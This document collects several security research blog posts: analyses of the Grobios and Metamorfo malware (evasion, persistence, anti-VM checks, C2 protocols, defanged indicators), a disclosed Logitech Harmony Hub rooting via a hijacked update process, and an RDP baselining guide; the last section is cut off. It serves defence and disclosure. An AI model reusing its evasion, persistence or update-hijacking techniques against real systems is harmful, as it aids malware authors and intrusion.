Grobios uses various techniques to evade detection and gain persistence on the machine, which makes it hard for it to be uninstalled or to go inactive on the victim machine. It also uses multiple anti-debugging, anti-analysis and anti-VM techniques to hide its behavior. After successful installation on the victim machine, it connects to its command and control (C2) server, which responds with commands.

In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx. The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash. The malware also uses stack strings. Figure 6 shows an example of the malware calling WinApi using the hashes.


Figure 6: An example of calling WinAPI using their hashes.

Loading

The malware sample starts a copy of itself, which further injects its code into svchost.exe or IEXPLORE.EXE depending on the user privilege level. Both parent and child quit after injection is complete. Only svchost.exe/IEXPLORE.EXE keeps running. Figure 7 shows the process tree.


Figure 7: Process tree of the malware

Persistence

The malware has an aggressive approach to persistence. It employs the following techniques:

  • It drops a copy of itself into the %APPDATA% folder, masquerading as a version of legitimate software installed on the victim machine. It creates an Autorun registry key and a shortcut in the Windows Startup folder. During our analysis, it dropped itself to the following path:

%APPDATA%\Google\v2.1.13554\<RandomName>.exe. 

The path can vary depending on the folders the malware finds in %APPDATA%.

  • It drops multiple copies of itself in subfolders of a program at the path %ProgramFiles%/%PROGRAMFILES(X86)%,  again masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
  • It drops a copy itself in the %Temp% folder, and creates a scheduled task to run it.

On an infected system, the malware creates two scheduled tasks, as shown in Figure 8.


Figure 8: Scheduled tasks created by the malware

The malware changes the file Created, Modified, and Accessed times of all of its dropped copies to the Last Modified time of ntdll.dll. To bypass the “File Downloaded from the Internet” warning, the malware removes the :Zone.Identifier flag using DeleteFile API, as shown in Figure 9.


Figure 9: Call to DeleteFileW to remove the :Zone.Identifier Flag from the dropped copy

An interesting behavior of this malware is that it protects its copy in the %TEMP% folder using EFS (Windows Encrypted File System), as seen in Figure 10.


Figure 10: Cipher Command Shows the Malware Copy Protected by EFS

Detecting VM and Malware Analysis Tools

Just before connecting to the C2, the malware does a series of checks to detect the VM and malware analysis environment. It can detect almost all well-known VM software, including Xen, QEMU, VMWare, Virtualbox, Hyper-V, and so on. The following is the list of checks it performs on the victim system:

  • Using the FindWindowEx API, it checks whether any of the analysis tools in Table 1 are running on the system.

Analysis Tools

PacketSniffer

FileMon

WinDbg

Process Explorer

OllyDbg

SmartSniff

cwmonitor

Sniffer

Wireshark

Table 1: Analysis tools detected by malware

  • The malware contains a list of hashes of blacklisted process names. It checks whether the hash of any of running process matches a hash on the blacklist, as shown in Figure 11. 


Figure 11: Check for blacklisted processes

We were able to crack the hashes of the blacklisted processes shown in Table 2.

Hash

Process

283ADE38h

vmware.exe

8A64214Bh

vmount2.exe

13A5F93h

vmusrvc.exe

0F00A9026h

vmsrvc.exe

0C96B0F73h

vboxservice.exe

0A1308D40h

vboxtray.exe

0E7A01D35h

xenservice.exe

205FAB41h

joeboxserver.exe

6F651D58h

joeboxcontrol.exe

8A703DD9h

wireshark.exe

1F758DBh

Sniffhit.exe

0CEF3A27Ch

sysAnalyzer.exe

6FDE1C18h

Filemon.exe

54A04220h

procexp.exe

0A17C90B4h

Procmon.exe

7215026Ah

Regmon.exe

788FCF87h

autoruns.exe

0A2BF507Ch

 

0A9046A7Dh

 

Table 2: Blacklisted processes

  • The malware enumerates registry keys in the following paths to see if they contain the words xen or VBOX:
    • HKLM\HARDWARE\ACPI\DSDT
    • HKLM\HARDWARE\ACPI\FADT
    • HKLM\HARDWARE\ACPI\RSDT
  • It checks whether services installed on the system contain any of the keywords in Table 3:

vmmouse

vmdebug

vmicexchange

vmicshutdown

vmicvss

vmicheartbeat

msvmmouf

VBoxMouse

vpcuhub

vpc-s3

vpcbus

vmx86

vmware

VMMEMCTL

VMTools

XenVMM

xenvdb

xensvc

xennet6

xennet

xenevtchn

VBoxSF

VBoxGuest

   

Table 3: Blacklisted service names

  • It checks whether the username contains any of these words:  MALWARE, VIRUS, SANDBOX, MALTEST
  • It has a list of hashes of blacklisted driver names. It traverses the windows driver directory %WINDIR%\system32\drivers\ using FindFirstFile/FindNextFile APIs to check if the hash of the name of any drivers matches with that of any blacklisted driver's name, as shown in Table 4.

Hash

Driver

0E687412Fh

hgfs.sys

5A6850A1h

vmhgfs.sys

0CA5B452h

prleth.sys

0F9E3EE20h

prlfs.sys

0E79628D7h

prlmouse.sys

68C96B8Ah

prlvideo.sys

0EEA0F1C2h

prl_pv32.sys

443458C9h

vpcs3.sys

2F337B97h

vmsrvc.sys

4D95FD80h

vmx86.sys

0EB7E0625h

vmnet.sys

Table 4: Hashes of blacklisted driver names

  • It calculates the hash of ProductId and matches it with three blacklisted hashes to detect public sandboxes, shown in Table 5.

Hash

Product Id

Sandbox Name

4D8711F4h

76487-337-8429955-22614

Anubis Sanbox

7EBAB69Ch

76487-644-3177037-23510

CWSandbox

D573F44D

55274-640-2673064-23950

Joe Sandbox

Table 5: Blacklisted product IDs

  • The malware calculates the hash of loaded module (DLL) names and compares them with the list of hashes of blacklisted module names shown in Table 6. These are the DLLs commonly loaded into the process being debugged, such as dbhelp.dll and api_log.dll.    

6FEC47C1h

6C8B2973h

0AF6D9F74h

49A4A30h

3FA86C7Dh

Table 6: Blacklisted module names hashes

Figure 12 shows the flow of code that checks for blacklisted module hashes.


Figure 12: Code checks for blacklisted module hashes

  • It checks whether Registry keys present at the path HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum and HKLM\SYSTEM\ControlSet001\Services\Disk\Enum contain any of these words: QEMU, VBOX, VMWARE, VIRTUAL
  • It checks whether registry keys at the path HKLM\SOFTWARE\Microsoft, HKLM\SOFTWARE  contain these words: VirtualMachine, vmware, Hyber-V
  • It checks whether the system bios version present at registry path HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion contains these words: QEMU, BOCHS, VBOX
  • It checks whether the video bios version present at registry path HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion contains  VIRTUALBOX substring.
  • It checks whether the registry key at path HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier contains any of these words: QEMU,vbox, vmware
  • It checks whether the registry key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions  exists on the system.

Network Communication

The malware contains two hardcoded obfuscated C2s. After de-obfuscating the C2 URLs, it generates a random string of 20 characters, appends it to the end of URL, and sends the request for commands. Before it executes the commands, the malware verifies the identity of the C2. It calculates the hash of 4 bytes of data using the CALG_MD5 algorithm. It then uses the Base64 data from the CERT command as a Public Key in CryptVerifySignature to verify the hash signature (Figure 13). If the signature is verified, the malware executes the commands.


Figure 13: Malware verifies the C2 hash

During our initial analysis, we found that the malware supports the commands shown in Table 7. 

Command

Description

CERT <Base64 data>

Contains the data used to verify the identity of the C2

CONNECT <IP:Port>

Connect to given host for further commands

DISCONNECT

Close all the connections

WAIT <Number of seconds>

Wait for the number of seconds before executing the next commands

REJECT

Kind of NOP. Move on to next command after waiting for 5 second

Table 7: Commands supported by malware

Figure 14 shows commands being issued by the C2 server.


Figure 14: Commands issued by the C2 server

Conclusion

Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye Network Security blocks delivery at the infection point.

Indicators of Compromise (IOCs)

  • 30f03b09d2073e415a843a4a1d8341af
  • 99787d194cbd629d12ef172874e82738
  • 169.239.129[.]17
  • grobiosgueng[.]su

Acknowledgments 

We acknowledge Mariam Muntaha for her contribution to the blog regarding malicious traffic analysis.

Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World

Introduction

FireEye’s Mandiant Red Team recently discovered vulnerabilities present on the Logitech Harmony Hub Internet of Things (IoT) device that could potentially be exploited, resulting in root access to the device via SSH. The Harmony Hub is a home control system designed to connect to and control a variety of devices in the user’s home. Exploitation of these vulnerabilities from the local network could allow an attacker to control the devices linked to the Hub as well as use the Hub as an execution space to attack other devices on the local network. As the Harmony Hub device list includes support for devices such as smart locks, smart thermostats as well as other smart home devices, these vulnerabilities present a very high risk to the users.

FireEye disclosed these vulnerabilities to Logitech in January 2018. Logitech was receptive and has coordinated with FireEye to release this blog post in conjunction with a firmware update (4.15.96) to address these findings.

The Red Team discovered the following vulnerabilities:

  • Improper certificate validation
  • Insecure update process
  • Developer debugging symbols left in the production firmware image
  • Blank root user password

The Red Team used a combination of the vulnerabilities to gain administrative access to the Harmony Hub. This blog post outlines the discovery and analysis process, and demonstrates the necessity of rigorous security testing of consumer devices – particularly as the public places an increasing amount of trust in devices that are not just connected to home networks, but also give access to many details about the daily lives of their users.

Device Analysis

Device Preparation

Publicly available research indicated the presence of a universal asynchronous receiver/transmitter (UART) interface on some of the test points on the Harmony Hub. We soldered jumper wires to the test pads, which allowed us to connect to the Harmony Hub using a TTL to USB serial cable. Initial analysis of the boot process showed that the Harmony Hub booted via U-Boot 1.1.4 and ran a Linux kernel (Figure 1).


Figure 1: Initial boot log output from UART interface

After this point in the boot process, the console stopped returning output because the kernel was not configured with any console interfaces. We reconfigured the kernel boot parameters in U-Boot to inspect the full boot process, but no useful information was recovered. Furthermore, because the UART interface was configured to only transmit, no further interaction could be performed with the Harmony Hub on this interface. Therefore, we shifted our focus to gaining a better understanding of the Linux operating system and associated software running on the Harmony Hub.

Firmware Recovery and Extraction

The Harmony Hub is designed to pair with a companion Android or iOS application over Bluetooth for its initial configuration. We created a wireless network with hostapd and installed a Burp Suite Pro CA certificate on a test Android device to intercept traffic sent by the Harmony mobile application to the Internet and to the Harmony Hub. Once initial pairing is complete, the Harmony application searches for Harmony Hubs on the local network and communicates with the Harmony Hub over an HTTP-based API.

Once connected, the Harmony application sends two different requests to Harmony Hub’s API, which cause the Harmony Hub to check for updates (Figure 2).


Figure 2: A query to force the Harmony Hub to check for updates

The Harmony Hub sends its current firmware version to a Logitech server to determine if an update is available (Figure 3). If an update is available, the Logitech server sends a response containing a URL for the new firmware version (Figure 4). Despite using a self-signed certificate to intercept the HTTPS traffic sent by the Harmony Hub, we were able to observe this process – demonstrating that the Harmony Hub ignores invalid SSL certificates.


Figure 3: The Harmony Hub checks for updates to its firmware


Figure 4: The server sends a response with a URL for the updated firmware

We retrieved this firmware and examined the file. After extracting a few layers of archives, the firmware can be found in the harmony-image.squashfs file. This filesystem image is a SquashFS filesystem compressed with lzma, a common format for embedded devices. However, vendors often use old versions of squashfstools that are incompatible with more recent squashfstools builds. We used the unsqashfs_all.sh script included in firmware-mod-kit to automate the process of finding the correct version of unsquashfs to extract the filesystem image (Figure 5).


Figure 5: Using firmware-mod-kit to extract the filesystem

With the filesystem contents extracted, we investigated some of the configuration details of the Harmony Hub’s operating system. Inspection revealed that various debug details were available in the production image, such as kernel modules that were not stripped (Figure 6).


Figure 6: Unstripped Linux kernel objects on the filesystem

Investigation of /etc/passwd showed that the root user had no password configured (Figure 7). Therefore, if we can enable the dropbear SSH server, we can gain root access to the Harmony Hub through SSH without a password.


Figure 7: /etc/passwd shows no password is configured for the root user

We observed that an instance of a dropbear SSH server will be enabled during initialization if the file /etc/tdeenable is present in the filesystem (Figure 8).


Figure 8: A dropbear SSH server is enabled by /etc/init.d/rcS script if /etc/tdeenable is present

Hijacking Update Process

During the initialization process, the Harmony Hub queries the GetJson2Uris endpoint on the Logitech API to obtain a list of URLs to use for various processes (Figure 9), such as the URL to use when checking for updated firmware or a URL to obtain information about updates’ additional software packages.


Figure 9: The request to obtain a list of URL endpoints for various processes

We intercepted and modified the JSON object in the response from the server to point the GetUpdates member to our own IP address, as shown in Figure 10.


Figure 10: The modified JSON object member

Similar to the firmware update process, the Harmony Hub sends a POST request to the endpoint specified by GetUpdates containing the current versions of its internal software packages. The request shown in Figure 11 contains a sample request for the HEOS package.


Figure 11: The JSON request object containing the current version of the “HEOS” package

If the sysBuild parameter in the POST request body does not match the current version known by the server, the server responds with an initial response containing information about the new package version. For an undetermined reason, the Harmony Hub ignores this initial response and sends a second request. The second response contains multiple URLs pointing to the updated package, as shown in Figure 12.


Figure 12: The JSON response containing URLs for the software update

We downloaded and inspected the .pkg files listed in the response object, which are actually just ZIP archives. The archives contain a simple file hierarchy, as shown in Figure 13.


Figure 13: The .pkg archive file hierarchy

The manifest.json file contains information used to instruct the Harmony Hub’s update process on how to handle the archive’s contents (Figure 14).


Figure 14: The contents of the manifest.json file

The Harmony Hub’s update process executes the script provided by the installer parameter of the manifest if it is present within the archive. We modified this script, as shown in Figure 15, to create the /etc/tdeenable file, which causes the boot process to enable the SSH interface as previously described.


Figure 15: The modified update.sh file

We created a new malicious archive with the appropriate .pkg extension, which was hosted on a local web server. The next time the Harmony Hub checked for updates against the URL supplied in the modified GetJson2URIs response, we sent a modified response to point to this update. The Harmony Hub retrieved our malicious update package, and after rebooting the Harmony Hub, the SSH interface was enabled. This allowed us to access the device with the username root and a blank password, as shown in Figure 16.


Figure 16: The SSH interface was enabled after a reboot

Conclusion

As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Due to the fact that the Harmony Hub, like many IoT devcies, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack. However, Logitech worked with our team to quickly address the vulnerabilities with their current firmware, 4.15.96. Developers of the devices we place our trust should be vigilant when removing potential attack vectors that could expose end users to security risks. We also want to share Logitech’s statement on the research and work by the Red Team:

"At Logitech, we take our customers’ security and privacy very seriously. In late January 2018, security research firm FireEye pointed out vulnerabilities that could impact Logitech Harmony Hub-based products*.

If a malicious hacker had already gained access to a Hub-users network, these vulnerabilities could be exploited. We appreciate the work that professional security research firms like FireEye provide when identifying these types of vulnerabilities on IoT devices.

As soon as FireEye shared their research findings with us, we reviewed internally and immediately started to develop firmware to address it. As of April 10, we have released firmware that addresses all of the vulnerabilities that were identified. For any customers who haven’t yet updated to firmware version 4.15.96, we recommend you check the MyHarmony software and sync your Hub-based remote and receive it. Complete directions on updating your firmware can be found here.

*Hub-based products include: Harmony Elite, Harmony Home Hub, Harmony Ultimate Hub, harmony Hub, Harmony Home Control, Harmony Pro, Harmony Smart Control, Harmony Companion, Harmony Smart Keyboard, Harmony Ultimate and Ultimate Home."

Establishing a Baseline for Remote Desktop Protocol

For IT staff and Windows power users, Microsoft Terminal Services Remote Desktop Protocol (RDP) is a beneficial tool that allows for the interactive use or administration of a remote Windows system. However, Mandiant consultants have also observed threat actors using RDP, with compromised domain credentials, to move laterally across networks with limited segmentation.

To understand how threat actors take advantage of RDP, consider the following example (and Figure 1):

  1. A staff member from the HR department working on his or her desktop inadvertently installs a malicious backdoor by interacting with a phishing email.
  2. The backdoor malware runs password stealing functionality from Mimikatz to obtain credentials stored in memory for any user accounts that have accessed the system.
  3. The backdoor creates a network tunnel to an attacker’s command and control (C2) server.
  4. The attacker logs on to the HR employee’s system with RDP through the network tunnel by using the compromised credentials.
  5. In pursuit of compromising financial information, the attacker uses Active Directory enumeration commands to identify domain-based systems used by the finance department.
  6. The attacker uses RDP and the compromised HR employee account to connect to a system in the finance department.
  7. The attacker uses Mimikatz to extract credentials on the finance system, resulting in access to  cached passwords for the finance employee who uses the system and an IT administrator who recently logged onto the system for troubleshooting.
  8. Using RDP, the attacker leverages the HR employee’s account, the finance employee’s account, and the IT administrator employee’s account to log onto additional systems in the environment.
  9. The attacker stages data onto the HR employee’s system.
  10. The attacker steals the files via the built-in RDP copy and paste functionality.


Figure 1: Example of a compromise that uses RDP for lateral movement

A best practice used to identify this type of activity is network baselining. To do this, an organization must first understand what is normal behavior for their specific environment, and then begin to configure detections based on unexpected patterns. Sample questions that can help determine practical detection techniques based on the aforementioned scenario include:

  1. Do our HR and/or finance employees typically use RDP?
  2. Do any of our HR employees RDP to a destination system in finance?
  3. Do any of our HR and/or finance employees RDP to multiple destination systems?
  4. Are the systems in our HR and/or finance departments used as source systems for RDP?
  5. Do our IT administrator accounts RDP from a source system that is not part of an IT network segment?
  6. Do any of our critical servers have logons from source systems that are not part of an IT network segment?
  7. Do any of our critical servers have RDP logons sourced from user accounts that are correlated to any of our HR and/or finance personnel?
  8. Is it expected for a single user account to initiate RDP connections from multiple source systems?

While it can take time to develop a customized process to baseline the scope of user accounts, source systems – and destination systems that leverage RDP in your organization’s environment – normalizing and reviewing this data will empower your staff with a deeper understanding of user account behavior, and the ability to detect unexpected activity to quickly begin investigating and triaging.

Tracking RDP through Event Logs

One first step and important resource for identifying your network’s typical behavior is through the use of event logs. RDP logons can generate file, event log, and registry artifacts on both the source and destination systems involved. Page 42 of JPCERT’s reference, “Detecting Lateral Movement through Tracking Event Logs,” details many artifacts that investigators may find on source and destination systems.

For the purpose of scalability, our baselining approach will focus on three high-fidelity logon events recorded on a destination system:

  • EID 21 and EID 25 within the “TerminalServices-LocalSessionManager” log, commonly located at “%systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx”
  • EID 4624 entries of Type 10 logons within the “Security” log, commonly located at “%systemroot%\Windows\System32\winevt\Logs\Security.evtx”

The EID 21 entry shown in Figure 2 is created on a destination system when a successful interactive local or remote logon event occurs.


Figure 2: EID 21 Example Structure

The EID 25 entry shown in Figure 3 is created on a destination system that has been reconnected from a system that previously established an RDP session that was not terminated through a proper user logout. For example, closing the RDP window (which would generate EID 24), as opposed to logging off through the start menu (which would generate EID 23).


Figure 3: EID 25 Example Structure

The EID 4624 entry is created on a destination system when a logon of any type occurs. For evidence of RDP authentication, we will focus on EID 4624 entries with with Logon Type 10 as shown in Figure 4, which correspond to RDP authentications.


Figure 4: Type 10 EID 4624 Example Structure

These event log entries provide evidence of a successful RDP authentication from one system to another. For most security teams to collect this event log data, the logs must either be forwarded to an aggregation platform, such as a security information and event management (SIEM) platform, or collected using a forensic acquisition utility such as FireEye’s Endpoint Security (HX) appliance. Once extracted, the data must be processed and stacked for frequency analysis. The scope of this post is to generate metrics based on unique user accounts, source systems, and destination systems.

For both EID 21 and EID 25, the user account and source system are captured in the event log strings, while the destination system is the system that recorded the event. Note that the “Source Network Address” recorded within the log may be either a hostname or an IP address. Your data processor may benefit from mapping IP addresses and hostnames together, while keeping Dynamic Host Configuration Protocol (DHCP) leases in mind. Understanding which systems correlate to specific user accounts or business units will greatly benefit the analysis of the processed results. If your organization does not track this information, you should request for this documentation to be created or captured within an asset management database for automated correlation.

Identifying Inconsistencies

Once RDP activity is baselined across your environment via the analysis of event logs, security analysts can then begin to identify RDP activity that deviates from business requirements and normalized patterns. Keep in mind that distinguishing between legitimate and anomalous RDP activity may take time.

Not only will DHCP logs prove useful when mapping IP address to hostnames, but documentation that associates systems and user accounts with specific business units can also help with reviewing and correlating observed RDP activity for suspicious or benign behavior. Any RDP activity inconsistent with expected business practices should be investigated. Additionally, RDP logons confirmed as benign should be noted in the baseline for future investigators.

Leveraging Metrics

By using SIEM correlation techniques, analysts can stack RDP activity by account, source system, and destination system, to pinpoint the number/count of the following metrics-related elements, which will deepen the security staff’s understanding of RDP activity in your network:

  • source systems per user account
  • destination systems per user account
  • user accounts per each source system to destination system path
  • user accounts per each source systems
  • user accounts per each destination system
  • source system to destination system paths per user account
  • total RDP logons per user account
  • total RDP logons per source system
  • total RDP logons per destination system
  • destination systems for each source system
  • source systems for each destination systems

This list of metrics is not exhaustive and can be expanded by including timestamp metadata if desired.

Recommendations

While baselining RDP activity may not readily identify threat actors who do not utilize this technique, or who take extra steps to blend in with legitimate user activity, it will continually help analysts better understand what normal behavior looks like in their specific environments – and could ultimately identify anomalies or potential indicators of unauthorized activity.

The following recommendations can help maximize the effectiveness of your RDP baselining exercises, while also reducing the opportunities for RDP to be leveraged for malicious actors within your environment:

  1. Disable the remote desktop service on end-user workstations and laptops, as well as systems where the service is not required for remote connectivity.
  2. Where connectivity using RDP is required, implement a combination of host and network-based controls to enforce that RDP connectivity must be initiated from specific jump boxes and centralized management servers for remote connection to endpoints.
  3. Host-based firewall rules that explicitly deny inbound RDP connections provide enhanced protections, especially for remote users that may utilize their system at locations outside of an organization’s managed infrastructure. Use host-based firewall rules to:
    • Deny inbound RDP connections by default.
    • When required, explicitly permit inbound RDP only from IP addresses correlating to authorized jump boxes.
  4. Employ the “Deny log on through Remote Desktop Services” security setting to prevent standard users from connecting to endpoints using RDP.
    • Ideally, this setting should also deny RDP access for privileged accounts (e.g. domain administrators, service accounts) on endpoints, as these types of accounts are commonly leveraged by attackers for laterally moving to sensitive systems within an environment.
  5. Prevent the use of RDP using local accounts by:
    • Installing KB2871997, and adding the SID “S-1-5-114: NT AUTHORITY\Local account and member of Administrators group” to the “Deny log on through Remote Desktop Services” security setting on endpoints. This can be accomplished by using Group Policy.
    • Randomizing passwords for the built-in local administrator account on endpoints with a solution such as Microsoft LAPS.
  6. Ensure that EID 21, EID 23, EID 24, and EID 25 within the “TerminalServices LocalSessionManager Operational” event log are being captured and forwarded to a SIEM or log aggregator.
  7. Confirm that EID 4624 within the “Security” event log is being captured and forwarded to a SIEM or log aggregator.
  8. Increase the maximum size of the “TerminalServices LocalSessionManager Operational” and event log to at least 500 MB. This can be accomplished by using Group Policy Preferences (GPP) to modify the “MaxSize” registry value within the registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TerminalServices-LocalSessionManager/Operational” on endpoints.
  9. Increase the maximum size of the “Security” event log to at least 1 GB.
  10. Monitor for evidence of the “Security” and “TerminalServices LocalSessionManager Operational” event logs being cleared (EID 1102).
  11. Create and regularly update documentation that maps user accounts and hostnames to business units.
  12. Ensure DHCP logs are archived and easily accessible to correlate source system IP addresses with their hostname at the time of a logon event.

Metamorfo Campaigns Targeting Brazilian Users

FireEye Labs recently identified several widespread malspam (malware spam) campaigns targeting Brazilian companies with the goal of delivering banking Trojans. We are referring to these campaigns as Metamorfo. Across the stages of these campaigns, we have observed the use of several tactics and techniques to evade detection and deliver the malicious payload. In this blog post we dissect two of the main campaigns and explain how they work.

Campaign #1

The kill chain starts with an email containing an HTML attachment with a refresh tag that uses a Google URL shortener as the target. Figure 1 shows a sample email, and Figure 2 show the contents of the HTML file.


Figure 1: Malicious Email with HTML Attachment


Figure 2: Contents of HTML File

When the URL is loaded, it redirects the victim to a cloud storage site such as GitHub, Dropbox, or Google Drive to download a ZIP file. An example is shown in Figure 3.


Figure 3: URL Shortener Redirects to Github Link

The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe.

The HTA script (Figure 4) contains VBS code that fetches a second blob of VBS code encoded in base64 form from hxxp://<redacted>/ilha/pz/logs.php. 


Figure 4: Contents of HTA File

After the second stage of VBS is decoded (Figure 5 and Figure 6), the script downloads the final stage from hxxp://<redacted>/28022018/pz.zip. 


Figure 5: Contents of Decoded VBS


Figure 6: More Contents of Decoded VBS

The downloaded ZIP file contains four files. Two are PE files. One is a legitimate Windows tool, pvk2pfx.exe, that is abused for DLL side-loading. One is the malicious banking Trojan as the DLL.

The VBS code unzips the archive, changes the extension of the legitimate Windows tool from .png to .exe, and renames the malicious DLL as cryptui.dll. The VBS code also creates a file in C:\Users\Public\Administrador\car.dat with random strings. These random strings are used to name the Windows tool, which is then executed. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

In Q4 of 2017, a similar malspam campaign delivered the same banking Trojan by using an embedded JAR file attached in the email instead of an HTML attachment. On execution, the Java code downloaded a ZIP archive from a cloud file hosting site such as Google Drive, Dropbox, or Github. The ZIP archive contained a legitimate Microsoft tool and the malicious Trojan.

Banking Trojan Analysis

The Trojan expects to be located in the hardcoded directory C:\\Users\\Public\Administrador\\ along with three other files to start execution. As seen in Figure 7, these files are:

  • car.dat (randomly generated name given to Windows tool)
  • i4.dt (VBS script that downloads the same zip file)
  • id (ID given to host)
  • cryptui.dll (malicious Trojan)


Figure 7: Contents of ZIP Archive

Persistence

The string found in the file C:\\Users\\Public\\Administrador\\car.dat is extracted and used to add the registry key Software\Microsoft\Windows\CurrentVersion\Run\<string from car.dat> for persistence, as shown in Figure 8.


Figure 8: Reading from car.dat File

The sample also looks for a file named i4.dt in the same directory and extracts the contents of it, renames the file to icone.vbs, and creates a new persistent key (Figure 9) in \Software\Microsoft\Windows\CurrentVersion\Run to open this file.


Figure 9: Persistence Keys

The VBS code in this file (Figure 10) has the ability to recreate the whole chain and download the same ZIP archive.


Figure 10: Contents of VBS Script

Next, the Trojan searches for several folders in the Program Files directories, including:

  • C:\\Program Files\\AVG
  • C:\\Program Files\\AVAST Software
  • C:\\Program Files\\Diebold\\Warsaw
  • C:\\Program Files\\Trusteer\\Rapport
  • C:\\Program Files\\Java
  • C:\\Program Files (x86)\\scpbrad

If any of the folders are found, this information, along with the hostname and Operating System version, is sent to a hardcoded domain with the hardcoded User-Agent value “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0” in the format shown in Figure 11. The value of AT is “<host_name+OS&MD>=<list of folders found>”.


Figure 11: Network Traffic for Host Enumeration

The sample iterates through the running processes, kills the following, and prevents them from launching:

  • msconfig.exe
  • TASKMGR.exe
  • regedit.exe
  • ccleaner64.exe
  • taskmgr.exe
  • itauaplicativo.exe

Next, it uses GetForegroundWindow to get a handle to the window the user is viewing and GetWindowText to extract the title of the window. The title is compared against a hardcoded list of Brazilian banking and digital coin sites. The list is extensive and includes major organizations and smaller entities alike. 

If any of those names are found and the browser is one of the following, the Trojan will terminate that browser.

  • firefox.exe
  • chrome.exe
  • opera.exe
  • safari.exe

The folder C:\Users\Public\Administrador\logs\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images.


Figure 12: Malware Capturing Mouse Clicks

Command and Control

The command and control (C2) server is selected based on the string in the file “id”:

  • al -> '185.43.209[.]182'
  • gr -> '212.237.46[.]6'
  • pz -> '87.98.146[.]34'
  • mn -> ’80.211.140[.]235'

The connection to one of the hosts is then started over raw TCP on port 9999. The command and control communication generally follows the pattern <|Command |>, for example:

  • '<|dispida|>logs>SAVE<' sends the screenshots collected in gh.txt.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep the connection alive.
  • '<|INFO|>' retrieves when the infection first started based on the file timestamp from car.dat along with '<|>' and the host information.

There were only four possible IP addresses that the sample analyzed could connect to based on the strings found in the file “id”. After further researching the associated infrastructure of the C2 (Figure 13), we were able to find potential number of victims for this particular campaign.

 

Figure 13: Command and Control Server Open Directories

Inside the open directories, we were able to get the following directories corresponding to the different active campaigns. Inside each directory we could find statistics with the number of victims reporting to the C2. As of 3/27/2018, the numbers were:

  • al – 843
  • ap – 879
  • gr – 397
  • kk – 2,153
  • mn – 296
  • pz – 536
  • tm – 187

A diagram summarizing Campaign #1 is shown in Figure 14.


Figure 14: Infection Chain of Campaign #1

Campaign #2

In the second campaign, FireEye Labs observed emails with links to legitimate domains (such as hxxps://s3-ap-northeast-1.amazonaws[.]com/<redacted>/Boleto_Protesto_Mes_Marco_2018.html) or compromised domains (such as hxxps://curetusu.<redacted>-industria[.]site/) that use a refresh tag with a URL shortener as the target. The URL shortener redirects the user to an online storage site, such as Google Drive, Github, or Dropbox, that hosts a malicious ZIP file. A sample phishing email is shown in Figure 15.


Figure 15: Example Phishing Email

The ZIP file contains a malicious executable written in AutoIt (contents of this executable are shown in Figur 16). When executed by the user, it drops a VBS file to a randomly created and named directory (such as C:\mYPdr\TkCJLQPX\HwoC\mYPdr.vbs) and fetches contents from the C2 server.


Figure 16: Contents of Malicious AutoIt Executable

Two files are downloaded from the C2 server. One is a legitimate Microsoft tool and the other is a malicious DLL: 

  • https[:]//panel-dark[.]com/w3af/img2.jpg
  • https[:]//panel-dark[.]com/w3af/img1.jpg

Those files are downloaded and saved into random directories named with the following patterns:

  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\<5 random chars>.exe
  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\CRYPTUI.dll 

The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system.


Figure 17: Persistence Key

The VBS file (Figure 18) will launch and execute the downloaded legitimate Windows tool, which in this case is Certmgr.exe. This tool will be abused using the DLL side loading technique. The malicious Cryptui.dll is loaded into the program instead of the legitimate one and executed.


Figure 18: Contents of Dropped VBS File

Banking Trojan Analysis

Like the Trojan from the first campaign, this sample is executed through search-order hijacking. In this case, the binary abused is a legitimate Windows tool, Certmgr.exe, that loads Cryptui.dll. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

The malicious DLL exports 21 functions. Only DllEntryPoint contains real code that is necessary to start the execution of the malicious code. The other functions return hardcoded values that serve no real purpose.

On execution, the Trojan creates a mutex called "correria24" to allow only one instance of it to run at a time.

The malware attempts to resolve “www.goole[.]com” (most likely a misspelling). If successful, it sends a request to hxxp://api-api[.]com/json in order to detect the external IP of the victim. The result is parsed and execution continues only if the country code matches “BR”, as shown in Figure 19.


Figure 19: Country Code Check

The malware creates an empty file in %appdata%\Mariapeirura on first execution, which serves as a mutex lock, before attempting to send any collected information to the C2 server. This is done in order to get only one report per infected host.

The malware collects host information, base64 encodes it, and sends it to two C2 servers. The following items are gathered from the infected system:

  • OS name
  • OS version
  • OS architecture
  • AV installed
  • List of banking software installed
  • IP address
  • Directory where malware is being executed from

The information is sent to hxxp://108.61.188.171/put.php (Figure 20).


Figure 20: Host Recon Data Sent to First C2 Server

The same information is sent to panel-dark[.]com/Contador/put.php (Figure 21).


